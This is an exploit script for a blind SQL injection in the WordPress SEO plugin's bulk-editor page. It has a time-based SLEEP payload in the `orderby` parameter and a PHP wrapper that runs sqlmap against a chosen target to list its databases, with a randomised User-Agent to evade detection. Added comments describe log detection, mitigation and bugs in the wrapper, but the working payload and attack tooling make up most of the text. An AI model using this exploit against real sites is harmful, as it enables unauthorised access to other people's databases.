[+] Blind SQL injection vulnerability in the WordPress SEO plugin
$target = "_TARGET_";
$exploit = "/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc";
[+] Using SQLMap:
<?php
// Command-line wrapper that builds one sqlmap command line against the
// WordPress SEO bulk-editor page and runs it through the shell.
//
// Defender notes:
// - The injection point is the `orderby` query parameter of
//   /wp-admin/admin.php?page=wpseo_bulk-editor (marked with `*` below).
//   A legitimate value is a plain column name, so access-log entries for
//   this page whose `orderby` contains commas, parentheses, SELECT or
//   SLEEP are worth alerting on.
// - The request carries WordPress login cookies, so the endpoint is
//   presumably reachable only with an authenticated session -- confirm
//   which role is required.
// - Mitigation: update the plugin to a release that validates `orderby`
//   against an allowlist of sortable columns (fixed version is not stated
//   on this page).

// Removes PHP's execution time limit; the run is expected to take a long time.
set_time_limit(0);
echo "[+] MINI exploit-SQLMAP / SQL vulnerability in WordPress SEO - Blind SQL\n";
// Takes the target from the first CLI argument and prefixes "http://" when the
// argument does not contain the substring "http"; with no argument, prints
// the error message and terminates.
// NOTE(review): strstr() matches "http" anywhere in the argument, not only at
// the start, so a host name that merely contains "http" is not prefixed.
$target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n");
// NOTE(review): $target is interpolated into a single-quoted shell argument
// without escapeshellarg(), so a quote character in the argument changes the
// command that the shell runs on the operator's own machine.
// Detection caveat: --random-agent varies the User-Agent header, so matching on
// a scanner User-Agent is unreliable; key detection on the request path and the
// content of `orderby` instead. The cookie values are truncated on this page.
$command = "python ../sqlmap/sqlmap.py -u '{$target}/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc' --batch --dbms=MySQL --cookie='wordpress_9d...; wordpress_logged_in_9dee67...;' --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --technique=B --eta --answers='follow=N' --dbs";
// NOTE(review): system()'s second parameter receives the integer exit status,
// not an array of output lines, so $dados[0] is not an output line. `.` binds
// tighter than `?:`, so the condition is the concatenation of system()'s return
// value and the result of empty(); that string appears to be always truthy, so
// exit() runs regardless of the outcome.
system($command, $dados).empty($dados[0]) ? exit() : NULL;